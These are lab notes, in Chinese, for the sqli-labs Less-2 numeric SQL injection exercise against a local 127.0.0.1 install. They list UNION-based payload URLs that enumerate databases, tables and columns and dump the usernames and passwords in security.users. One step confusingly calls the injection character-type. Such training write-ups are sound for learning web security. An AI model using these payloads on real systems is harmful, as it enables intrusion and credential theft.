sqli-labs闯关笔记-less2-数字型注入

打开Less-2中index.php文件，在第32行$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";后面添加如下两行：

echo $sql;   打印输出的sql语句
echo "<br/>"; 打印换行符

 

 1、查看是否有注入，经报错显示是字符型注入，后面进行注入时不需要加单引号。

 

 2、查看有多少列，使用二分法，直到查到准确的列，现在表里有3列。

http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3 -- 

3、查看哪些数据可以回显

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 -- 

4、 查看数据库security

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,schema_name from information_schema.schemata -- 

显示所有数据库名

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata -- 

5、查看数据库

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,database() -- 

6、查看数据库security的所有表

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--

7、查看所有列信息

http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273-- 

8、得到帐号密码

http://127.0.0.1/sqli-labs/Less-2/?id=-1  union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--